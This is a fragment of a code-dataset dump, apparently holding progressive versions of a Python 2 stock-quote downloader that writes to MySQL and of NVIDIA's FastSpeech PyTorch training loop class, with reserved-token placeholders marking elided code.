on baby\n# 1377\n# come on baby\n# 1378\n# come on baby\n# 1379\n# come on baby\n# 1380\n# come on baby\n# 1381\n# come on baby\n# 1382\n# come on baby\n# 1383\n# come on baby\n# 1384\n# come on baby\n# 1385\n# come on baby\n# 1386\n# come on baby\n# 1387\n# come on baby\n# 1388\n# come on baby\n# 1389\n# come on baby\n# 1390\n# come on baby\n# 1391\n# come on baby\n# 1392\n# come on baby\n# 1393\n# come on baby\n# 1394\n# come on baby\n# 1395\n# come on baby\n# 1396\n# 1397\n# 1398\n# 1399\n# 1400\n# 1401\n# 1402\n# 1403\n# 1404\n# 1405\n\n\n# ...\n# ...\n\n\n# 1786\n# 1787\n# 1788\n# 1789\n# 1790\n# 1791\n# 1792\n# 1793\n# 1794\n# 1795\n# 1796\n# 1797\n# 1798\n# 1799\n# [42, None, 'hello']\n# 1800\n# 1801\n# 1802\n# 1803\n# 1804\n# 1805\n# 1806\n# 1807\n# 1808\n# 1809\n\n\n# ...\n# ...\n\n\n# 1989\n# 1990\n# 1991\n# 1992\n# 1993\n# 1994\n# 1995\n# 1996\n# 1997\n# 1998\n# 1999\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import stockquote
import time
import datetime
from datetime import date
from connection import db
start_date='20100101'
def prices(symbol):
"""
Loads the prices from the start date for the given symbol
Only new quotes are downloaded.
"""
to = date.today().strftime("%Y%m%d")
c = db.cursor()
c.execute("SELECT DATE_ADD(max(date), INTERVAL 1 DAY) FROM quote where symbol = %s",
        (symbol, ))
(_from, ) = c.fetchone()
if _from == date.today():
print "Skipping %s" % symbol
return
print "Downloading %s" % symbol
if _from is None:
_from = start_date
else:
_from = _from.strftime("%Y%m%d")
prices = stockquote.get_historical_prices(symbol, _from, to)
headers = prices[0]
try:
close = get_idx(headers, 'Close')
date_ = get_idx(headers, 'Date')
open = get_idx(headers, 'Open')
high = get_idx(headers, 'High')
low = get_idx(headers, 'Low')
quotes = prices[1:]
for l in quotes:
#print "%s %s" % (l[date_], l[close])
try:
insert(symbol, l[date_], l[close], l[high], l[low], l[open])
except Exception, e:
print "Could not insert %s:%s" % (symbol, e)
print "Inserted %s new quotes for %s" % (len(quotes), symbol)
except Exception, e:
print "Could not download %s" % symbol
print e
def get_idx(headers, query):
for index, item in enumerate(headers):
if (item == query):
return index
#print("Could not find requested header [%s]" % query)
#print("Available ones are %s" % headers)
raise "Eror ind downloading quote"
def insert(symbol, date, close, high, low, open):
c = db.cursor()
c.execute("INSERT INTO quote (date, symbol, close, high, low, open) VALUES (%s, %s, %s, %s, %s, %s)",
(date, symbol, close, high, low, open))
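# Usage sketch (hypothetical symbol list; assumes the MySQL `quote` table
# referenced above already exists). insert() does not commit, so a commit on
# the shared connection is assumed to be needed afterwards.
#
#     if __name__ == '__main__':
#         for sym in ['AAPL', 'GOOG']:
#             prices(sym)
#         db.commit()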
|
normal
|
{
"blob_id": "1b58d294f02ce85bf19da03f94100af87408081d",
"index": 1326,
"step-1": "import stockquote\nimport time\nimport datetime\nfrom datetime import date\nfrom connection import db\n\nstart_date='20100101'\ndef prices(symbol):\n \"\"\"\n Loads the prices from the start date for the given symbol\n Only new quotes are downloaded.\n \"\"\"\n to = date.today().strftime(\"%Y%m%d\")\n c = db.cursor()\n c.execute(\"SELECT DATE_ADD(max(date), INTERVAL 1 DAY) FROM quote where symbol = %s\",\n (symbol))\n (_from, ) = c.fetchone()\n if _from == date.today():\n print \"Skipping %s\" % symbol\n return\n print \"Downloading %s\" % symbol\n if _from is None: \n _from = start_date\n else:\n _from = _from.strftime(\"%Y%m%d\")\n prices = stockquote.get_historical_prices(symbol, _from, to)\n headers = prices[0]\n try:\n close = get_idx(headers, 'Close')\n date_ = get_idx(headers, 'Date')\n open = get_idx(headers, 'Open')\n high = get_idx(headers, 'High')\n low = get_idx(headers, 'Low')\n quotes = prices[1:]\n for l in quotes:\n #print \"%s %s\" % (l[date_], l[close])\n try:\n insert(symbol, l[date_], l[close], l[high], l[low], l[open])\n except Exception, e:\n print \"Could not insert %s:%s\" % (symbol, e)\n print \"Inserted %s new quotes for %s\" % (len(quotes), symbol)\n except Exception, e:\n print \"Could not download %s\" % symbol\n print e\n\ndef get_idx(headers, query):\n for index, item in enumerate(headers):\n if (item == query):\n return index\n #print(\"Could not find requested header [%s]\" % query)\n #print(\"Available ones are %s\" % headers)\n raise \"Eror ind downloading quote\"\n\ndef insert(symbol, date, close, high, low, open):\n c = db.cursor()\n c.execute(\"INSERT INTO quote (date, symbol, close, high, low, open) VALUES (%s, %s, %s, %s, %s, %s)\",\n (date, symbol, close, high, low, open))\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class Trainer(object):
<|reserved_special_token_0|>
def __init__(self, data_loader, model_name, model, optimizer_fn,
final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path
=None, n_epochs=None, save_steps=None, log_steps=10, device='cuda',
use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None,
pyprof_enabled=False, detect_anomaly=False, seed=None):
self.data_loader = data_loader
self.model_name = model_name
self.model = model
self.n_epochs = n_epochs
self.save_steps = save_steps
self.log_steps = log_steps
self.ckpt_path = ckpt_path
self.log_path = log_path
self.final_steps = final_steps
self.step = step
self.device = device
self.use_amp = use_amp
self.nvprof_iter_start = nvprof_iter_start
self.nvprof_iter_end = nvprof_iter_end
self.pyprof_enabled = pyprof_enabled
self.detect_anomaly = detect_anomaly
self.model.train()
to_device_async(self.model, self.device)
num_param = sum(param.numel() for param in model.parameters())
tprint('The number of {} parameters: {}'.format(self.model_name,
num_param))
self.optimizer = optimizer_fn(model)
if lr_scheduler_fn:
self.lr_scheduler = lr_scheduler_fn(self.optimizer)
else:
self.lr_scheduler = None
if self.use_amp:
from apex import amp
self.model, self.optimizer = amp.initialize(self.model, self.
optimizer, opt_level='O1')
if (nvprof_iter_start and nvprof_iter_end is not None and
pyprof_enabled):
from apex import pyprof
pyprof.nvtx.init()
self.model = nn.DataParallel(self.model)
if seed is None:
seed = np.random.randint(2 ** 16)
np.random.seed(seed)
torch.manual_seed(seed)
self.data_loader_iter = self.repeat(self.data_loader, n_epochs)
if log_path:
log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))
self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)
if self.ckpt_path:
self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)
pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)
self.load()
<|reserved_special_token_0|>
@abc.abstractmethod
def loss(self, inputs, model):
        raise NotImplementedError
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def save(self):
state_dict = {'step': self.step, 'model': self.model.state_dict(),
'optim': self.optimizer.state_dict()}
torch.save(state_dict, self.ckpt_path + '/checkpoint_{:06d}.pt'.
format(self.step))
tprint('[Save] Model "{}". Step={}.'.format(self.model_name, self.step)
)
def load(self, load_optim=True):
files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))
if files_exist:
latest_file = max(files_exist, key=os.path.getctime)
state_dict = torch.load(latest_file)
self.step = state_dict['step']
self.model.load_state_dict(state_dict['model'])
if load_optim:
self.optimizer.load_state_dict(state_dict['optim'])
tprint("[Load] Checkpoint '{}'. Step={}".format(latest_file,
self.step))
else:
tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path)
)
def console_log(self, tag, loss, meta):
msg = 'loss: {:.6f}'.format(loss)
for key, value in meta.items():
msg += ',\t{}: {:.4f}'.format(key, value)
tprint(msg)
def tensorboard_log(self, tag, loss):
self.tbwriter.add_scalar('{}/loss'.format(tag), loss, global_step=
self.step)
@staticmethod
def repeat(iterable, n_repeat=None):
cnt = 0
while n_repeat is None or cnt < n_repeat:
for x in iterable:
yield x
cnt += 1
return StopIteration()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Trainer(object):
"""
set seed
set n_epochs, n_steps
save/load model
validation
logging
distributed
"""
def __init__(self, data_loader, model_name, model, optimizer_fn,
final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path
=None, n_epochs=None, save_steps=None, log_steps=10, device='cuda',
use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None,
pyprof_enabled=False, detect_anomaly=False, seed=None):
self.data_loader = data_loader
self.model_name = model_name
self.model = model
self.n_epochs = n_epochs
self.save_steps = save_steps
self.log_steps = log_steps
self.ckpt_path = ckpt_path
self.log_path = log_path
self.final_steps = final_steps
self.step = step
self.device = device
self.use_amp = use_amp
self.nvprof_iter_start = nvprof_iter_start
self.nvprof_iter_end = nvprof_iter_end
self.pyprof_enabled = pyprof_enabled
self.detect_anomaly = detect_anomaly
self.model.train()
to_device_async(self.model, self.device)
num_param = sum(param.numel() for param in model.parameters())
tprint('The number of {} parameters: {}'.format(self.model_name,
num_param))
self.optimizer = optimizer_fn(model)
if lr_scheduler_fn:
self.lr_scheduler = lr_scheduler_fn(self.optimizer)
else:
self.lr_scheduler = None
if self.use_amp:
from apex import amp
self.model, self.optimizer = amp.initialize(self.model, self.
optimizer, opt_level='O1')
if (nvprof_iter_start and nvprof_iter_end is not None and
pyprof_enabled):
from apex import pyprof
pyprof.nvtx.init()
self.model = nn.DataParallel(self.model)
if seed is None:
seed = np.random.randint(2 ** 16)
np.random.seed(seed)
torch.manual_seed(seed)
self.data_loader_iter = self.repeat(self.data_loader, n_epochs)
if log_path:
log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))
self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)
if self.ckpt_path:
self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)
pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)
self.load()
def train(self):
try:
with torch.autograd.profiler.emit_nvtx(enabled=self.pyprof_enabled
):
for i in range(self.step + 1, self.final_steps + 1):
self.step = i
tprint('------------- TRAIN step : {} -------------'.
format(i))
if self.nvprof_iter_start and i == self.nvprof_iter_start:
profiler.start()
timer = TimeElapsed(name=
'Training time during profiling', format=':.6f')
timer.start()
with Nvtx('step #{}'.format(self.step)):
loss, meta = self.do_step()
if self.nvprof_iter_end and i == self.nvprof_iter_end:
profiler.stop()
timer.end()
if self.lr_scheduler:
for param_group in self.optimizer.param_groups:
tprint('lr: {:06f}'.format(param_group['lr']))
self.lr_scheduler.step(self.step)
if self.step % self.log_steps == 0:
self.log(loss, meta)
if (self.ckpt_path and self.save_steps and i % self.
save_steps == 0):
self.save()
tprint('Training has been done.')
except StopIteration:
tprint('Training has been done. (by n_epochs)')
except KeyboardInterrupt:
tprint('Training has been canceled.')
@abc.abstractmethod
def loss(self, inputs, model):
        raise NotImplementedError
def do_step(self):
with Nvtx('data load', enabled=False):
data = next(self.data_loader_iter)
with torch.autograd.set_detect_anomaly(mode=self.detect_anomaly):
with Nvtx('forward'):
loss, meta = self.loss(data, self.model)
self.optimizer.zero_grad()
with Nvtx('backward'):
if self.use_amp:
from apex import amp
with amp.scale_loss(loss, self.optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
with Nvtx('weight update'):
self.optimizer.step()
return loss, meta
def log(self, loss, meta):
self.console_log('train', loss, meta)
if self.log_path:
self.tensorboard_log('train', loss)
def save(self):
state_dict = {'step': self.step, 'model': self.model.state_dict(),
'optim': self.optimizer.state_dict()}
torch.save(state_dict, self.ckpt_path + '/checkpoint_{:06d}.pt'.
format(self.step))
tprint('[Save] Model "{}". Step={}.'.format(self.model_name, self.step)
)
def load(self, load_optim=True):
files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))
if files_exist:
latest_file = max(files_exist, key=os.path.getctime)
state_dict = torch.load(latest_file)
self.step = state_dict['step']
self.model.load_state_dict(state_dict['model'])
if load_optim:
self.optimizer.load_state_dict(state_dict['optim'])
tprint("[Load] Checkpoint '{}'. Step={}".format(latest_file,
self.step))
else:
tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path)
)
def console_log(self, tag, loss, meta):
msg = 'loss: {:.6f}'.format(loss)
for key, value in meta.items():
msg += ',\t{}: {:.4f}'.format(key, value)
tprint(msg)
def tensorboard_log(self, tag, loss):
self.tbwriter.add_scalar('{}/loss'.format(tag), loss, global_step=
self.step)
@staticmethod
def repeat(iterable, n_repeat=None):
cnt = 0
while n_repeat is None or cnt < n_repeat:
for x in iterable:
yield x
cnt += 1
return StopIteration()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
plt.switch_backend('Agg')
class Trainer(object):
"""
set seed
set n_epochs, n_steps
save/load model
validation
logging
distributed
"""
def __init__(self, data_loader, model_name, model, optimizer_fn,
final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path
=None, n_epochs=None, save_steps=None, log_steps=10, device='cuda',
use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None,
pyprof_enabled=False, detect_anomaly=False, seed=None):
self.data_loader = data_loader
self.model_name = model_name
self.model = model
self.n_epochs = n_epochs
self.save_steps = save_steps
self.log_steps = log_steps
self.ckpt_path = ckpt_path
self.log_path = log_path
self.final_steps = final_steps
self.step = step
self.device = device
self.use_amp = use_amp
self.nvprof_iter_start = nvprof_iter_start
self.nvprof_iter_end = nvprof_iter_end
self.pyprof_enabled = pyprof_enabled
self.detect_anomaly = detect_anomaly
self.model.train()
to_device_async(self.model, self.device)
num_param = sum(param.numel() for param in model.parameters())
tprint('The number of {} parameters: {}'.format(self.model_name,
num_param))
self.optimizer = optimizer_fn(model)
if lr_scheduler_fn:
self.lr_scheduler = lr_scheduler_fn(self.optimizer)
else:
self.lr_scheduler = None
if self.use_amp:
from apex import amp
self.model, self.optimizer = amp.initialize(self.model, self.
optimizer, opt_level='O1')
if (nvprof_iter_start and nvprof_iter_end is not None and
pyprof_enabled):
from apex import pyprof
pyprof.nvtx.init()
self.model = nn.DataParallel(self.model)
if seed is None:
seed = np.random.randint(2 ** 16)
np.random.seed(seed)
torch.manual_seed(seed)
self.data_loader_iter = self.repeat(self.data_loader, n_epochs)
if log_path:
log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))
self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)
if self.ckpt_path:
self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)
pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)
self.load()
def train(self):
try:
with torch.autograd.profiler.emit_nvtx(enabled=self.pyprof_enabled
):
for i in range(self.step + 1, self.final_steps + 1):
self.step = i
tprint('------------- TRAIN step : {} -------------'.
format(i))
if self.nvprof_iter_start and i == self.nvprof_iter_start:
profiler.start()
timer = TimeElapsed(name=
'Training time during profiling', format=':.6f')
timer.start()
with Nvtx('step #{}'.format(self.step)):
loss, meta = self.do_step()
if self.nvprof_iter_end and i == self.nvprof_iter_end:
profiler.stop()
timer.end()
if self.lr_scheduler:
for param_group in self.optimizer.param_groups:
tprint('lr: {:06f}'.format(param_group['lr']))
self.lr_scheduler.step(self.step)
if self.step % self.log_steps == 0:
self.log(loss, meta)
if (self.ckpt_path and self.save_steps and i % self.
save_steps == 0):
self.save()
tprint('Training has been done.')
except StopIteration:
tprint('Training has been done. (by n_epochs)')
except KeyboardInterrupt:
tprint('Training has been canceled.')
@abc.abstractmethod
def loss(self, inputs, model):
        raise NotImplementedError
def do_step(self):
with Nvtx('data load', enabled=False):
data = next(self.data_loader_iter)
with torch.autograd.set_detect_anomaly(mode=self.detect_anomaly):
with Nvtx('forward'):
loss, meta = self.loss(data, self.model)
self.optimizer.zero_grad()
with Nvtx('backward'):
if self.use_amp:
from apex import amp
with amp.scale_loss(loss, self.optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
with Nvtx('weight update'):
self.optimizer.step()
return loss, meta
def log(self, loss, meta):
self.console_log('train', loss, meta)
if self.log_path:
self.tensorboard_log('train', loss)
def save(self):
state_dict = {'step': self.step, 'model': self.model.state_dict(),
'optim': self.optimizer.state_dict()}
torch.save(state_dict, self.ckpt_path + '/checkpoint_{:06d}.pt'.
format(self.step))
tprint('[Save] Model "{}". Step={}.'.format(self.model_name, self.step)
)
def load(self, load_optim=True):
files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))
if files_exist:
latest_file = max(files_exist, key=os.path.getctime)
state_dict = torch.load(latest_file)
self.step = state_dict['step']
self.model.load_state_dict(state_dict['model'])
if load_optim:
self.optimizer.load_state_dict(state_dict['optim'])
tprint("[Load] Checkpoint '{}'. Step={}".format(latest_file,
self.step))
else:
tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path)
)
def console_log(self, tag, loss, meta):
msg = 'loss: {:.6f}'.format(loss)
for key, value in meta.items():
msg += ',\t{}: {:.4f}'.format(key, value)
tprint(msg)
def tensorboard_log(self, tag, loss):
self.tbwriter.add_scalar('{}/loss'.format(tag), loss, global_step=
self.step)
@staticmethod
def repeat(iterable, n_repeat=None):
cnt = 0
while n_repeat is None or cnt < n_repeat:
for x in iterable:
yield x
cnt += 1
return StopIteration()
<|reserved_special_token_1|>
import abc
import glob
import pathlib
import numpy as np
import torch
from tensorboardX import SummaryWriter
import time
import os
import matplotlib.pyplot as plt
from torch import nn
from fastspeech.utils.logging import tprint
from fastspeech.utils.pytorch import to_device_async
from fastspeech.utils.nvtx import Nvtx
from fastspeech.utils.fp16 import cast_model_to_half
import torch.cuda.profiler as profiler
from fastspeech.utils.logging import tprint
from fastspeech.utils.time import TimeElapsed
plt.switch_backend('Agg')
class Trainer(object):
"""
set seed
set n_epochs, n_steps
save/load model
validation
logging
distributed
"""
def __init__(self, data_loader, model_name, model, optimizer_fn,
final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path
=None, n_epochs=None, save_steps=None, log_steps=10, device='cuda',
use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None,
pyprof_enabled=False, detect_anomaly=False, seed=None):
self.data_loader = data_loader
self.model_name = model_name
self.model = model
self.n_epochs = n_epochs
self.save_steps = save_steps
self.log_steps = log_steps
self.ckpt_path = ckpt_path
self.log_path = log_path
self.final_steps = final_steps
self.step = step
self.device = device
self.use_amp = use_amp
self.nvprof_iter_start = nvprof_iter_start
self.nvprof_iter_end = nvprof_iter_end
self.pyprof_enabled = pyprof_enabled
self.detect_anomaly = detect_anomaly
self.model.train()
to_device_async(self.model, self.device)
num_param = sum(param.numel() for param in model.parameters())
tprint('The number of {} parameters: {}'.format(self.model_name,
num_param))
self.optimizer = optimizer_fn(model)
if lr_scheduler_fn:
self.lr_scheduler = lr_scheduler_fn(self.optimizer)
else:
self.lr_scheduler = None
if self.use_amp:
from apex import amp
self.model, self.optimizer = amp.initialize(self.model, self.
optimizer, opt_level='O1')
if (nvprof_iter_start and nvprof_iter_end is not None and
pyprof_enabled):
from apex import pyprof
pyprof.nvtx.init()
self.model = nn.DataParallel(self.model)
if seed is None:
seed = np.random.randint(2 ** 16)
np.random.seed(seed)
torch.manual_seed(seed)
self.data_loader_iter = self.repeat(self.data_loader, n_epochs)
if log_path:
log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))
self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)
if self.ckpt_path:
self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)
pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)
self.load()
def train(self):
try:
with torch.autograd.profiler.emit_nvtx(enabled=self.pyprof_enabled
):
for i in range(self.step + 1, self.final_steps + 1):
self.step = i
tprint('------------- TRAIN step : {} -------------'.
format(i))
if self.nvprof_iter_start and i == self.nvprof_iter_start:
profiler.start()
timer = TimeElapsed(name=
'Training time during profiling', format=':.6f')
timer.start()
with Nvtx('step #{}'.format(self.step)):
loss, meta = self.do_step()
if self.nvprof_iter_end and i == self.nvprof_iter_end:
profiler.stop()
timer.end()
if self.lr_scheduler:
for param_group in self.optimizer.param_groups:
tprint('lr: {:06f}'.format(param_group['lr']))
self.lr_scheduler.step(self.step)
if self.step % self.log_steps == 0:
self.log(loss, meta)
if (self.ckpt_path and self.save_steps and i % self.
save_steps == 0):
self.save()
tprint('Training has been done.')
except StopIteration:
tprint('Training has been done. (by n_epochs)')
except KeyboardInterrupt:
tprint('Training has been canceled.')
@abc.abstractmethod
def loss(self, inputs, model):
        raise NotImplementedError
def do_step(self):
with Nvtx('data load', enabled=False):
data = next(self.data_loader_iter)
with torch.autograd.set_detect_anomaly(mode=self.detect_anomaly):
with Nvtx('forward'):
loss, meta = self.loss(data, self.model)
self.optimizer.zero_grad()
with Nvtx('backward'):
if self.use_amp:
from apex import amp
with amp.scale_loss(loss, self.optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
with Nvtx('weight update'):
self.optimizer.step()
return loss, meta
def log(self, loss, meta):
self.console_log('train', loss, meta)
if self.log_path:
self.tensorboard_log('train', loss)
def save(self):
state_dict = {'step': self.step, 'model': self.model.state_dict(),
'optim': self.optimizer.state_dict()}
torch.save(state_dict, self.ckpt_path + '/checkpoint_{:06d}.pt'.
format(self.step))
tprint('[Save] Model "{}". Step={}.'.format(self.model_name, self.step)
)
def load(self, load_optim=True):
files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))
if files_exist:
latest_file = max(files_exist, key=os.path.getctime)
state_dict = torch.load(latest_file)
self.step = state_dict['step']
self.model.load_state_dict(state_dict['model'])
if load_optim:
self.optimizer.load_state_dict(state_dict['optim'])
tprint("[Load] Checkpoint '{}'. Step={}".format(latest_file,
self.step))
else:
tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path)
)
def console_log(self, tag, loss, meta):
msg = 'loss: {:.6f}'.format(loss)
for key, value in meta.items():
msg += ',\t{}: {:.4f}'.format(key, value)
tprint(msg)
def tensorboard_log(self, tag, loss):
self.tbwriter.add_scalar('{}/loss'.format(tag), loss, global_step=
self.step)
@staticmethod
def repeat(iterable, n_repeat=None):
cnt = 0
while n_repeat is None or cnt < n_repeat:
for x in iterable:
yield x
cnt += 1
return StopIteration()
<|reserved_special_token_1|>
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the NVIDIA CORPORATION nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import abc
import glob
import pathlib
import numpy as np
import torch
from tensorboardX import SummaryWriter
import time
import os
import matplotlib.pyplot as plt
from torch import nn
from fastspeech.utils.logging import tprint
from fastspeech.utils.pytorch import to_device_async
from fastspeech.utils.nvtx import Nvtx
from fastspeech.utils.fp16 import cast_model_to_half
import torch.cuda.profiler as profiler
from fastspeech.utils.logging import tprint
from fastspeech.utils.time import TimeElapsed
plt.switch_backend('Agg')
class Trainer(object):
"""
set seed
set n_epochs, n_steps
save/load model
validation
logging
distributed
"""
def __init__(self, data_loader, model_name, model, optimizer_fn, final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path=None, n_epochs=None, save_steps=None, log_steps=10, device='cuda', use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None, pyprof_enabled=False, detect_anomaly=False, seed=None):
self.data_loader = data_loader
self.model_name = model_name
self.model = model
self.n_epochs = n_epochs
self.save_steps = save_steps
self.log_steps = log_steps
self.ckpt_path = ckpt_path
self.log_path = log_path
self.final_steps = final_steps
self.step = step
self.device = device
self.use_amp = use_amp
self.nvprof_iter_start = nvprof_iter_start
self.nvprof_iter_end = nvprof_iter_end
self.pyprof_enabled = pyprof_enabled
self.detect_anomaly = detect_anomaly
# model
self.model.train()
to_device_async(self.model, self.device)
num_param = sum(param.numel() for param in model.parameters())
tprint('The number of {} parameters: {}'.format(
self.model_name, num_param))
# optimizer
self.optimizer = optimizer_fn(model)
# lr scheduler
if lr_scheduler_fn:
self.lr_scheduler = lr_scheduler_fn(self.optimizer)
else:
self.lr_scheduler = None
# automatic mixed precision
if self.use_amp:
from apex import amp
self.model, self.optimizer = amp.initialize(self.model,
self.optimizer,
opt_level='O1')
# profile
if nvprof_iter_start and nvprof_iter_end is not None and pyprof_enabled:
from apex import pyprof
pyprof.nvtx.init()
# data parallel
self.model = nn.DataParallel(self.model)
# set seed
if seed is None:
seed = np.random.randint(2**16)
np.random.seed(seed)
torch.manual_seed(seed)
# data loader
self.data_loader_iter = self.repeat(self.data_loader, n_epochs)
# logging
if log_path:
            # tensorboard log path : {log_path}/YYYYMMDD-HHMMSS
log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))
self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)
# checkpoint path
if self.ckpt_path:
self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)
pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)
# load checkpoint
self.load()
def train(self):
try:
with torch.autograd.profiler.emit_nvtx(enabled=self.pyprof_enabled):
for i in range(self.step+1, self.final_steps + 1):
self.step = i
tprint("------------- TRAIN step : {} -------------".format(i))
if self.nvprof_iter_start and i == self.nvprof_iter_start:
profiler.start()
timer = TimeElapsed(name="Training time during profiling", format=":.6f")
timer.start()
with Nvtx("step #{}".format(self.step)):
loss, meta = self.do_step()
if self.nvprof_iter_end and i == self.nvprof_iter_end:
profiler.stop()
timer.end()
if self.lr_scheduler:
for param_group in self.optimizer.param_groups:
tprint("lr: {:06f}".format(param_group['lr']))
self.lr_scheduler.step(self.step)
if self.step % self.log_steps == 0:
self.log(loss, meta)
if self.ckpt_path and self.save_steps and i % self.save_steps == 0:
self.save()
tprint("Training has been done.")
except StopIteration: # done by n_epochs
tprint("Training has been done. (by n_epochs)")
except KeyboardInterrupt:
tprint("Training has been canceled.")
@abc.abstractmethod
def loss(self, inputs, model):
        raise NotImplementedError
def do_step(self):
with Nvtx("data load", enabled=False):
data = next(self.data_loader_iter)
with torch.autograd.set_detect_anomaly(mode=self.detect_anomaly):
with Nvtx("forward"):
loss, meta = self.loss(data, self.model)
self.optimizer.zero_grad()
with Nvtx("backward"):
if self.use_amp:
from apex import amp
with amp.scale_loss(loss, self.optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
with Nvtx("weight update"):
self.optimizer.step()
return loss, meta
def log(self, loss, meta):
self.console_log('train', loss, meta)
if self.log_path:
self.tensorboard_log('train', loss)
def save(self):
state_dict = {
'step': self.step,
'model': self.model.state_dict(),
'optim': self.optimizer.state_dict(),
}
torch.save(state_dict, self.ckpt_path +
'/checkpoint_{:06d}.pt'.format(self.step))
tprint('[Save] Model "{}". Step={}.'.format(
self.model_name, self.step))
def load(self, load_optim=True):
files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))
if files_exist:
# load the latest created file.
latest_file = max(files_exist, key=os.path.getctime)
state_dict = torch.load(latest_file)
self.step = state_dict['step']
self.model.load_state_dict(state_dict['model'])
if load_optim:
self.optimizer.load_state_dict(state_dict['optim'])
tprint('[Load] Checkpoint \'{}\'. Step={}'.format(
latest_file, self.step))
else:
tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path))
def console_log(self, tag, loss, meta):
# console logging
msg = 'loss: {:.6f}'.format(loss)
for key, value in meta.items():
msg += ',\t{}: {:.4f}'.format(key, value)
tprint(msg)
def tensorboard_log(self, tag, loss):
self.tbwriter.add_scalar(
'{}/loss'.format(tag), loss, global_step=self.step)
@staticmethod
def repeat(iterable, n_repeat=None):
cnt = 0
while n_repeat is None or cnt < n_repeat:
for x in iterable:
yield x
cnt += 1
return StopIteration()
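# Subclass sketch (hypothetical names): a concrete trainer only needs to
# implement loss(), returning the (scalar_loss, meta_dict) pair consumed by
# do_step() and console_log() above.
#
#     class MSETrainer(Trainer):
#         def loss(self, inputs, model):
#             x, y = inputs
#             pred = model(x.to(self.device))
#             loss = torch.nn.functional.mse_loss(pred, y.to(self.device))
#             return loss, {'mse': loss.item()}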
|
flexible
|
{
"blob_id": "9fa534664056a8cf9e9a64ccc7d6dd4de2ec0936",
"index": 1514,
